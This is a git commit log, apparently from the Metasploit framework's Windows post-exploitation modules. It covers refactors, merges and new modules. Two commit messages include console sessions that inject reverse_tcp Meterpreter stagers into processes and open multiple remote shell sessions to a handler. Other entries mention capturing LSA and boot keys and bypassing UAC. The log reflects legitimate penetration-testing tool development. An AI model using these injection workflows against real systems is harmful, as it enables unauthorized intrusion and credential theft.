2013-10-16 23:53:33 -04:00
60d8ee1434
move capture_lsa_key to priv
2013-10-16 23:45:28 -04:00
1a9fcf2cbb
move convert_des_56_to_64 to priv
2013-10-16 23:39:07 -04:00
26d07c0689
add a needed -end
2013-10-16 23:35:14 -04:00
b318e32487
removed duplicate code for capture_boot_key functions
2013-10-16 23:17:20 -04:00
8be21a7413
remove the insane amount of rescues
2013-10-16 22:58:14 -04:00
1a85bd22a8
move capture_boot_key to post win priv
2013-10-16 22:46:15 -04:00
b223504980
clean up run code - remove catchall rescue
2013-10-16 22:22:45 -04:00
ca88c071cf
remove unneeded railgun call and make vprints out of commented puts
2013-10-16 22:20:21 -04:00
f672e2075b
get rid of ID and Version
2013-10-16 22:18:24 -04:00
2fbd7ea0ba
msftidy up
2013-10-16 22:17:05 -04:00
b42687151f
convert from tabs to spaces
2013-10-16 22:14:55 -04:00
c59bdbf52e
move Rob Bathurst enum_lsa module in from the unstable cold
2013-10-16 22:10:22 -04:00
f0aedd932d
More stragglers
2013-10-16 16:29:55 -05:00
f57032636e
Straggler on a weird boilerplate format
2013-10-15 14:57:04 -05:00
5d86ab4ab8
Catch mis-formatted bracket comments.
2013-10-15 14:52:12 -05:00
ed0b84b7f7
Another round of re-splatting.
2013-10-15 14:14:15 -05:00
c83262f4bd
Resplat another common boilerplate.
2013-10-15 14:07:48 -05:00
23d058067a
Redo the boilerplate / splat
...
[SeeRM #8496 ]
2013-10-15 13:51:57 -05:00
378f403fab
Land #2453 , Add stdapi_net_resolve_host(s) to Python Meterpreter.
...
Moves resolve_host post module to multi and depreciates Windows module.
Resolve will now return nil for failed lookups instead of an empty
string.
2013-10-10 20:13:06 +01:00
d208ab9260
Added multiple payload capabilities
...
Added support to specify multiple payload delivery options.
msf post(payload_inject) > show options
Module options (post/windows/manage/payload_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT 2 no Select the amount of shells you want to spawn.
HANDLER false no Start an Exploit Multi Handler to receive the connection
LHOST XXXXXXXX yes IP of host that will receive the connection from the payload.
LPORT 4433 no Port for Payload to connect to.
OPTIONS #<Msf::OptInt:0x007f5c6439c6d8> no Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.
PAYLOAD windows/meterpreter/reverse_tcp no Windows Payload to inject into memory of a process.
PID no Process Identifier to inject of process to inject payload.
SESSION 1 yes The session to run this module on.
msf post(payload_inject) > set HANDLER true
HANDLER => true
msf post(payload_inject) > exploit
[*] Running module against XXXXXXXX
[*] Starting exploit multi handler
[*] Performing Architecture Check
[*] Started reverse handler on XXXXXXXX:4433
[*] Starting the payload handler...
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[*] Sending stage (770048 bytes) to XXXXXXXX
[+] Successfully injected payload in to process: 884
[*] Performing Architecture Check
[*] Process found checking Architecture
[+] Process is the same architecture as the payload
[*] Injecting Windows Meterpreter (Reflective Injection), Reverse TCP Stager into process ID 884
[*] Opening process 884
[*] Generating payload
[*] Allocating memory in procees 884
[*] Allocated memory at address 0x00ba0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected payload in to process: 884
[*] Post module execution completed
msf post(payload_inject) > [*] Meterpreter session 2 opened (XXXXXXXX:4433 -> XXXXXXXX:2962) at 2013-10-09 21:54:25 -0400
[*] Sending stage (770048 bytes) to XXXXXXXX
msf post(payload_inject) > [*] Meterpreter session 3 opened (XXXXXXXX:4433 -> XXXXXXXX:2963) at 2013-10-09 21:54:27 -0400
2013-10-09 22:01:11 -04:00
bec239abf1
Added ability to generate multiple payloads - not just one
...
Ran into a pentest recently where I had a flaky meterpreter shell, had it launch multiple ones just to be safe. The amount datastore allows you to iterate through and spawn multiple sessions.
msf exploit(psexec) > use post/windows/manage/multi_meterpreter_inject
msf post(multi_meterpreter_inject) > show options
Module options (post/windows/manage/multi_meterpreter_inject):
Name Current Setting Required Description
---- --------------- -------- -----------
AMOUNT 1 no Select the amount of shells you want to spawn.
HANDLER false no Start new multi/handler job on local box.
IPLIST XXXXXXXXX yes List of semicolom separated IP list.
LPORT 4444 no Port number for the payload LPORT variable.
PAYLOAD windows/meterpreter/reverse_tcp no Payload to inject in to process memory
PIDLIST no List of semicolom separated PID list.
SESSION yes The session to run this module on.
msf post(multi_meterpreter_inject) > set AMOUNT 5
AMOUNT => 5
msf post(multi_meterpreter_inject) > set HANDLER true
HANDLER => true
msf post(multi_meterpreter_inject) > set SESSION 1
SESSION => 1
msf post(multi_meterpreter_inject) > exploit
[*] Running module against XXXXXXXXX
[*] Starting connection handler at port 4444 for windows/meterpreter/reverse_tcp
[+] Multi/Handler started!
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5400
[*] Injecting meterpreter into process ID 5400
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5400
[*] Meterpreter session 2 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4991) at 2013-10-09 18:04:02 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4136
[*] Injecting meterpreter into process ID 4136
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4136
[*] Meterpreter session 3 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4992) at 2013-10-09 18:04:08 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 4108
[*] Injecting meterpreter into process ID 4108
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 4108
[*] Meterpreter session 4 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4993) at 2013-10-09 18:04:13 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 5788
[*] Injecting meterpreter into process ID 5788
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 5788
[*] Meterpreter session 5 opened (XXXXXXXXX:4444 -> XXXXXXXXX:4994) at 2013-10-09 18:04:19 -0400
[*] Creating a reverse meterpreter stager: LHOST=XXXXXXXXX LPORT=4444
[+] Starting Notepad.exe to house Meterpreter Session.
[+] Process created with pid 1408
[*] Injecting meterpreter into process ID 1408
[*] Allocated memory at address 0x003b0000, for 290 byte stager
[*] Writing the stager into memory...
[+] Successfully injected Meterpreter in to process: 1408
[*] Meterpreter session 6 opened (XXXXXXXXX:4444 -> XXXXXXXXX:1029) at 2013-10-09 18:04:24 -0400
[*] Post module execution completed
msf post(multi_meterpreter_inject) >
2013-10-09 18:11:09 -04:00
6c382c8eb7
Return nil on error, and move the module to post/multi.
2013-10-09 16:52:53 -04:00
c2c6422078
Correct the name of "DynDNS" (not Dyn-DNS)
2013-10-09 09:56:07 -05:00
7d0cf73af7
Fix multi-meter_inject error msg
...
Was trying to coerce the exception class
to string rather than calling .message
Results in a stacktrace.
FIXRM #8460
2013-10-08 11:11:38 -05:00
4dc88cf60f
Expand descriptions for ease of use.
2013-09-30 13:30:31 -05:00
7cc2ad55a6
Land #1770 , unattend.xml snarfing modules
2013-09-27 16:04:38 -05:00
d869b1bb70
Unless, unless everywhere.
2013-09-27 15:55:57 -05:00
ae655e42d2
Touchups: boolean check, unless, and TODO comment
2013-09-27 15:54:03 -05:00
37e4d58f4a
Call CSV text/plain so it can be viewed normally
...
Otherwise, things parsing through the loot table will treat it as binary
data, and not display it in a normal texty way, even though it's totally
readable with just a little squinting.
2013-09-27 15:48:48 -05:00
5e77dccd48
Add a ref to an example unattend.xml
2013-09-27 15:45:57 -05:00
f9359c9d88
Use meterpreter dns resolve
2013-09-24 21:58:04 +01:00
2eff44d7e1
Swap x64/x86 detection
2013-09-24 20:01:45 +01:00
b6fd14fd66
Use meterp dns lookup
2013-09-24 19:58:09 +01:00
f1e563d375
Merge branch 'master' of github.com:rapid7/metasploit-framework into enum_ad_perf
2013-09-24 19:08:52 +01:00
7eecf7e6f0
Land #2415 , @Meatballs1's fix for resolve_hosts platform list
2013-09-24 12:37:03 -05:00
4b4ab3a6a0
Remove Linux Plat from ResolveHosts
2013-09-24 12:00:53 -05:00
8db1a389eb
Land #2304 fix post module require order
...
Incidentally resolve conflict on current_user_psexec to account for the
new powershell require.
2013-09-23 16:52:23 -05:00
e885ab45b6
Land #1734 Metasploit side for ip resolv
2013-09-23 16:18:40 -05:00
150f0f644e
Merge branch 'rapid7' into bug/osx-mods-load-order
...
Conflicts:
modules/post/windows/gather/enum_dirperms.rb
2013-09-17 18:21:13 -05:00
84f015320a
Probably helps to use the right alternate exploit name.
2013-09-12 16:16:49 -05:00
14577441ca
Deprecates windows persistence post module.
2013-09-12 16:10:48 -05:00
58b634dd27
Remove unnecessary requires from post mods
2013-09-12 14:36:01 -05:00
aff35a615b
Grammar fixes in descriptions
2013-09-09 15:09:53 -05:00
b3b8cee870
Retab changes for PR #1473
2013-09-05 16:19:05 -05:00
0ba4e1da65
Merge for retab
2013-09-05 16:18:56 -05:00
2e9096d427
Retab changes for PR #1734
2013-09-05 14:59:41 -05:00
322ed35bb4
Merge for retab
2013-09-05 14:59:34 -05:00
2846a5d680
Retab changes for PR #1770
2013-09-05 14:57:40 -05:00
269c1a26cb
Merge for retab
2013-09-05 14:57:32 -05:00
26b8364dcb
Retab changes for PR #1789
2013-09-05 14:44:21 -05:00
789be1fe3e
Merge for retab
2013-09-05 14:44:14 -05:00
c5daf939d1
Stabs tabassassin
2013-09-05 20:36:52 +01:00
874ed2ac17
Retab changes for PR #2107
2013-09-05 14:30:08 -05:00
27564b2de2
Merge for retab
2013-09-05 14:30:03 -05:00
845bf7146b
Retab changes for PR #2304
2013-09-05 13:41:25 -05:00
adf9ff356c
Merge for retab
2013-09-05 13:41:23 -05:00
9f3a5dc5d0
Retab new modules
2013-09-04 12:32:53 -05:00
999b802468
Merge branch 'master' into retab/rumpus
2013-09-04 12:32:05 -05:00
a8e77c56bd
Updates
2013-09-03 22:46:20 +01:00
ac0c493cf9
Merge branch 'master' of github.com:rapid7/metasploit-framework into local_win_priv_keyring
2013-09-03 21:33:11 +01:00
13244efecf
Spacing and bugfixes
2013-09-02 21:57:11 +01:00
051ef0bdfa
Refactor to common post module
2013-09-02 20:24:54 +01:00
a4bcc1f82f
Correct module naming style
...
You know what it is.
2013-08-31 18:17:06 -05:00
41e4375e43
Retab modules
2013-08-30 16:28:54 -05:00
63adde2429
Fix load order in posts, hopefully forever
2013-08-29 13:37:50 -05:00
66886eed7a
Land #2283 , @bmerinofe's post module for PortProxy Port Forwarding
2013-08-28 17:34:14 -05:00
f477711268
Provide more information about installing IPv6
2013-08-28 17:22:50 -05:00
43badfaa1c
Move the check_ipv6 call to the run metod
2013-08-28 17:20:11 -05:00
05863cb1cc
Delete vague exception handling only done on one place
2013-08-28 17:17:05 -05:00
6b8c7cbe24
Omit parentheses for method call with no args
2013-08-28 17:15:28 -05:00
c04e6b2b14
Reduce code complexity on check_ipv6
2013-08-28 17:13:21 -05:00
f339510816
Use OptPort
2013-08-28 17:10:22 -05:00
ad8b6ec1ef
Avoid redefine builtin datastore options
2013-08-28 17:08:22 -05:00
ad1b9fbaef
Use datastore options to avoid complex logic around args
2013-08-28 17:00:10 -05:00
c68986e6eb
Favor unless over if not
2013-08-28 16:50:44 -05:00
3a2a2a9cc0
Beautify metadata
2013-08-28 16:48:36 -05:00
c31a2332be
Juan changes applied
2013-08-28 19:53:54 +02:00
1042dbe56a
Land #2108 , @jiuweigui's post module to get info from prefetch files
2013-08-28 10:01:06 -05:00
0fbe411be7
Ensure use Ruby File
2013-08-28 09:55:21 -05:00
5c32bb4a8e
Beautify metadata
2013-08-28 09:32:23 -05:00
4f8ba82d02
Make gather_pf_info return a prefetch entry
2013-08-28 09:29:49 -05:00
904bd12663
Fix print over nil or empty string
2013-08-28 09:27:18 -05:00
ef3085823c
Use default timeout value
2013-08-28 09:26:46 -05:00
8ac82b8b18
Beautify timezone_key_values function
2013-08-28 09:25:49 -05:00
bc593aab4f
Avoid confusion between variable and method name
2013-08-28 09:24:32 -05:00
2b577552a2
OptEnum option changed
2013-08-26 15:25:23 +02:00
64d21c7216
added portproxy post meterpreter module
2013-08-26 14:44:41 +02:00
2ebfdcc84b
Fix to description
2013-08-24 19:32:01 +03:00
73f4259156
Fix based on suggestions
2013-08-24 19:14:48 +03:00
514d2b4721
Fix to make msftidy happy.
2013-08-21 21:46:44 +03:00
0cc499faf7
Minor deletes related to filetime change.
2013-08-21 14:47:50 +03:00
3a2433dac9
Remove unneeded filetime read
2013-08-21 12:18:07 +03:00
86d6bce8c4
[FixRM #8312 ] - Fix file handle leaks
...
Fix file handle leaks for [SeeRM #8312 ]
2013-08-18 20:31:13 -05:00
0063d4e06c
Extend description & add Win2k3 section to WinXP section.
2013-08-16 14:44:08 +03:00
8602e744da
Add support for Win2k3
2013-08-16 02:46:16 +03:00
83a179ff08
[Fix RM 8224] - undefined method `include?' for nil:NilClass
...
Bug due to registry_enumkeys returning nil.
2013-08-15 16:04:35 -05:00
c9799c1ee6
Land #2212 - Change migrate order & print target_pid
2013-08-13 18:56:54 -05:00
73e9bf9fa8
Merge branch 'bug/smart_migrate' of github.com:/dmaloney-r7/metasploit-framework into bug/smart_migrate
...
Conflicts:
modules/post/windows/manage/smart_migrate.rb
2013-08-13 13:56:01 -05:00
6be4d9e583
missing interpolation
2013-08-13 13:52:44 -05:00
ebd485349f
Retab smart_migrate.rb module
...
Retabs completely for PR #2212
2013-08-12 20:23:33 -05:00
bfb5040dbf
Remove deprecated modules
...
These three modules are well over their deprecation dates. Making good
on that threat now.
* service_permissions: Marked for removal on 2013-01-10
* bypassuac: Marked for removal on 2013-01-04
* ms10_092_schelevator: Marked for removal on 2013-06-01
2013-08-12 11:21:45 -05:00
c9bd791ff6
fix smart_migrate choice order
...
was trying winlogon first
should do explorer first
2013-08-12 11:02:27 -05:00
021c358159
Land #2203 - Fix regex for x64 detection
2013-08-09 13:23:38 -05:00
7178633140
Fixed architecture detection in bypassuac modules
2013-08-09 03:42:02 +02:00
98c8c16803
Change offset values and hostname length
2013-08-05 12:29:54 +02:00
3e6de5d2e9
added a post-exploitation module to dump the cache dns entries
2013-08-03 13:37:32 +02:00
7e539332db
Reverting disaster merge to 593363c5f with diff
...
There was a disaster of a merge at 6f37cf22eb593363c5f9
2013-07-29 21:47:52 -05:00
William Vu
David Maloney
jvazquez-r7
James Lee
scriptjunkie
Thomas Ring
Tod Beardsley
HD Moore
Meatballs
sinn3r
Your Name
Rob Fuller
Luke Imhoff
jvennix-r7
Trevor Rosen
Brandon Turner
OJ
staaldraad
Meatballs1
bcoles
jiuweigui
Niel Nielsen
bmerinofe
TabAssassin
Tod Beardsley
Joshua Harper PI GCFE GCFA GSEC
jonvalt
Norbert Szetei
trustedsec
Spencer McIntyre
jvazquez-r7
Joe Vennix
Tab Assassin
jiuweigui
Sagi Shahar